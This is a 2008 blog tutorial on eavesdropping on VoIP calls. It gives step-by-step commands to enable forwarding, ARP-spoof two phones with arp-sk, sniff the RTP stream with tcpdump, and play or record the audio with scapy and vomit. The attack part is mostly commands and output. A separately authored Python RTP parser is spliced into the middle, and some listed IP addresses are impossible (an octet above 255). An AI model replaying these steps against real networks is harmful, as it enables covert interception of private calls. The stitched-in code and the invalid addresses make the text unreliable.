Longjidin’s Kg Lengkong to Bukit Lada

Intercepting VoIP Calls A Demonstration

Posted in Demo by longjidin on December 20, 2008

Hello, this tutorial or demonstration is all about intercepting VoIP calls, but what is VoIP actually? VoIP (aka Voice over Internet Protocol, IP Telephony, Internet telephony or Broadband Phone) is routing voice communication over the internet or private networks instead of traditional POTS lines. VoIP is getting more popular with businesses and home users around the world. VoIP can be pretty secure, but as usual most people don't implement it well. Systems are left in their default configuration because they work, and this can introduce insecurities. This tutorial or demonstration will explain how to intercept VoIP calls on a network in a switched environment between 2 known users. We will use different kinds of software to spoof ARP, sniff the network, and "record" the actual conversation. I assume you're on a *nix based machine; no worries if you're on an NT machine, you will still learn a lot, or use one of the many Live CDs out there.

You can get more general information about VoIP at

http://en.wikipedia.org/wiki/VoIP

Our Scenario:

To intercept the VoIP call we will first need to intercept the RTP stream. Because this is on a network you may sit between the caller and the called person, but that is not often the case, so we will need to employ ARP spoofing. Many networks don't have the security features enabled that disable ARP spoofing, and the systems will happily accept the changes. A lot of companies have their VoIP traffic on a dedicated VLAN on the network. An attacker can easily access the VoIP VLAN, because the phone generally provides the network connection to the PC.

Tools I used are dsniff's arpspoof (http://www.monkey.org/~dugsong/dsniff) or arp-sk (http://www.arp-sk.org) to corrupt the ARP cache. After that you will be able to access the VoIP data stream with a sniffer. I used tcpdump as my sniffer, but you could use ethereal if you wish.

This is my configuration:

Name      MAC address         IP address
Caller    00:78:64:01:13:01   217.170.8.1
Caller_A  00:78:64:01:13:02   217.656.8.2
Attacker  00:99:60:01:01:66   217.656.8.9

Let's Start:

On our attacker server we need to turn on routing, turn off ICMP redirects and then re-increment the TTL using iptables. Check your manual for more information on how to enable this. Some systems will accept the following, but this varies by platform.

# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -I FORWARD -i eth0 -o eth0 -j ACCEPT
# echo 0 > /proc/sys/net/ipv4/conf/eth0/send_redirects
# iptables -t mangle -A FORWARD -j TTL --ttl-inc 1

The attacker has a MAC address of 00:99:60:01:01:66 and an IP address of 217.656.8.9 and uses eth0.

# arp-sk -w -d Caller -S Caller_A -D Caller
+ Initialization of the packet structure
+ Running mode "who-has"
+ Ifname: eth0
+ Source MAC: 00:99:60:01:01:66
+ Source ARP MAC: 00:99:60:01:01:66
+ Source ARP IP : 217.656.8.2
+ Target MAC: 00:78:64:01:13:01
+ Target ARP MAC: 00:00:00:00:00
+ Target ARP IP : 217.170.8.1
--- Start classical sending ---
TS: 20:42:48.782795
To: 00:78:64:01:13:01 From: 00:99:60:01:01:66 0x0806
ARP Who has 217.170.8.1 (00:00:00:00:00) ?
Tell 217.656.8.2 (00:99:60:01:01:66)
TS: 20:42:48.803565
To: 00:78:64:01:13:01 From: 00:99:60:01:01:66 0x0806
ARP Who has 217.170.8.1 (00:00:00:00:00) ?
Tell 217.656.8.2 (00:99:60:01:01:66)

Now, Caller thinks that Caller_A is at 00:99:60:01:01:66 (Attacker). A tcpdump shows us that we succeeded in corrupting his ARP cache.

Sniffing with network device eth0:

# tcpdump -i eth0 -ne arp
[Output trimmed]
Now we need to do the same attack against Caller_A in order to sniff the return traffic.

# arp-sk -w -d Caller_A -S Caller -D Caller_A
+ Initialization of the packet structure
+ Running mode "who-has"
+ Ifname: eth0
+ Source MAC: 00:99:60:01:01:66
+ Source ARP MAC: 00:99:60:01:01:66
+ Source ARP IP: 217.170.8.1
+ Target MAC: 00:78:64:01:13:02
+ Target ARP MAC: 00:00:00:00:00
+ Target ARP IP: 217.656.8.2
--- Start classical sending ---
TS: 20:42:48.782795
To: 00:78:64:01:13:02 From: 00:99:60:01:01:66 0x0806
ARP Who has 217.170.8.1 (00:00:00:00:00) ?
Tell 217.170.8.1 (00:99:60:01:01:66)
TS: 20:42:48.803565
To: 00:78:64:01:13:02 From: 00:99:60:01:01:66 0x0806
ARP Who has 217.170.8.1 (00:00:00:00:00) ?
Tell 217.170.8.1 (00:99:60:01:01:66)

Now, Caller_A thinks that Caller is at 00:99:60:01:01:66 (Attacker). A tcpdump shows us that we succeeded in corrupting his ARP cache.

Sniffing with network device eth0:

# tcpdump -i eth0 -ne arp
[Output trimmed]
Sniffing:

We're now set to start sniffing UDP traffic between the 2 phones.

# tcpdump -i eth0 -n host 217.170.8.1
21:53:28.838301 217.170.8.1.27182 > 217.656.8.2.19560 udp 172 [tos 0xb8]
21:53:28.838301 217.656.8.2.19560 > 217.170.8.1.27182 udp 172
21:53:28.838301 217.170.8.1.27182 > 217.656.8.2.19560 udp 172 [tos 0xb8]
21:53:28.838301 217.656.8.2.19560 > 217.170.8.1.27182 udp 172

In most cases the phones only send UDP traffic, the RTP stream, on local ports 27182 and 19560 in our example.

Decoding:

After you have identified the RTP stream, you will need to find the codec used to encode the voice. You can find this information in the payload type (PT) field of the RTP packets in the UDP stream, or in the Media Format field in the SIP exchange.

Most cheap phones don't use a bandwidth-friendly codec; they use G.711, also known as PCM, or G.729 for the ones that optimize bandwidth usage. The tools I am going to use to decode the RTP stream (G.711) are vomit (http://vomit.xtdnet.nl) and scapy (http://www.secdev.org/projects/scapy).
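The PT field the post points at sits in the RTP header that rides inside each of those UDP datagrams. The following Python, added here as an example and not code from the post, from vomit or from scapy, parses the RTP fixed header as RFC 3550 defines it (including the CSRC list, the header extension and padding) and maps the static audio payload types of RFC 3551 to codec names. The sample packet is constructed: its 172-byte size is the one the post's tcpdump lines show, which is a 12-byte RTP header plus 160 bytes of G.711, i.e. 20 ms of audio at 8000 samples per second. The same parser works on SRTP, whose header is sent in the clear; the difference a monitor sees is only that the payload behind a PT of 0 or 8 no longer decodes to audio.

```python
import struct
from dataclasses import dataclass
from typing import Tuple

# Static audio payload types from RFC 3551, table 4 (subset). Anything >= 96
# is dynamic and only resolvable from the a=rtpmap line of the SDP in the SIP exchange.
STATIC_AUDIO_PT = {
    0: "PCMU (G.711 u-law)",
    3: "GSM",
    4: "G723",
    8: "PCMA (G.711 A-law)",
    9: "G722",
    18: "G729",
}


@dataclass(frozen=True)
class RtpHeader:
    version: int
    padding: bool
    extension: bool
    marker: bool
    payload_type: int
    sequence: int
    timestamp: int
    ssrc: int
    csrc: Tuple[int, ...]
    payload_len: int  # bytes of codec data after header, extension and padding


def parse_rtp(udp_payload: bytes) -> RtpHeader:
    """Parse the RTP fixed header (RFC 3550 section 5.1) from a UDP payload."""
    if len(udp_payload) < 12:
        raise ValueError("too short for an RTP header")
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", udp_payload[:12])
    version = b0 >> 6
    if version != 2:
        raise ValueError(f"not RTP version 2 (got {version})")
    padding = bool(b0 & 0x20)
    extension = bool(b0 & 0x10)
    cc = b0 & 0x0F
    offset = 12 + 4 * cc
    if len(udp_payload) < offset:
        raise ValueError("truncated CSRC list")
    csrc = struct.unpack(f"!{cc}I", udp_payload[12:offset]) if cc else ()
    if extension:
        # 2-byte profile id, 2-byte length in 32-bit words, then the words.
        if len(udp_payload) < offset + 4:
            raise ValueError("truncated extension header")
        _, ext_words = struct.unpack("!HH", udp_payload[offset:offset + 4])
        offset += 4 + 4 * ext_words
        if len(udp_payload) < offset:
            raise ValueError("truncated extension data")
    pad_len = udp_payload[-1] if padding else 0  # last byte holds the pad count
    payload_len = len(udp_payload) - offset - pad_len
    if payload_len < 0:
        raise ValueError("padding count exceeds packet")
    return RtpHeader(version, padding, extension, bool(b1 & 0x80), b1 & 0x7F,
                     seq, ts, ssrc, tuple(csrc), payload_len)


def codec_name(pt: int) -> str:
    return STATIC_AUDIO_PT.get(pt, "dynamic/unknown: resolve via SDP a=rtpmap")


def build_g711_packet(seq: int = 1, timestamp: int = 0, ssrc: int = 0x1234ABCD,
                      pt: int = 0, samples: int = 160) -> bytes:
    """Constructed 20 ms G.711 packet: 12-byte header + one byte per sample.

    160 samples at 8000/s is 20 ms, so the UDP payload is 172 bytes, the
    size in the post's tcpdump output. 0xFF is u-law near-silence.
    """
    header = struct.pack("!BBHII", 0x80, pt, seq, timestamp, ssrc)
    return header + bytes([0xFF]) * samples


if __name__ == "__main__":
    pkt = build_g711_packet()
    hdr = parse_rtp(pkt)
    print(f"UDP payload {len(pkt)} bytes, PT={hdr.payload_type} -> "
          f"{codec_name(hdr.payload_type)}, {hdr.payload_len} bytes of audio, "
          f"seq={hdr.sequence}, ssrc=0x{hdr.ssrc:08x}")
```

A PT value the static table does not know is the usual case for anything negotiated per call, which is why the post also points at the SIP exchange: the a=rtpmap line there binds the dynamic number to a codec name.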

I prefer Scapy over Vomit, so let's start with Scapy. With Scapy you can sniff live traffic and it will automatically decode the RTP stream. It can feed the conversation directly to the speakers. Let's start by running Scapy.

# ./scapy
Welcome to Scapy (1.0.17.20beta)
>>> voip_play("217.170.8.1", iface="eth0")

It is also possible to run Scapy on a WLAN with or without WEP encryption. Running Scapy on a WLAN is actually the same as running it on eth0; check the documentation for more information on this. Another tool to convert the conversation from G.711 to WAV is Vomit. We can use Vomit on a tcpdump output file. You can do this as follows.

# vomit -r Conversation.tcpdump | waveplay -S8000 -B16 -C1

Now you have successfully intercepted and recorded VoIP calls.

Links:

VoIP security issues:

http://pcworld.about.com/news/May052005id120668.htm

ARP Spoofing:

http://en.wikipedia.org/wiki/ARP_spoofing

Sniffing:

http://www.irongeek.com/i.php?page=security/AQuickIntrotoSniffers

Dsniff Package:

http://www.monkey.org/~dugsong/dsniff
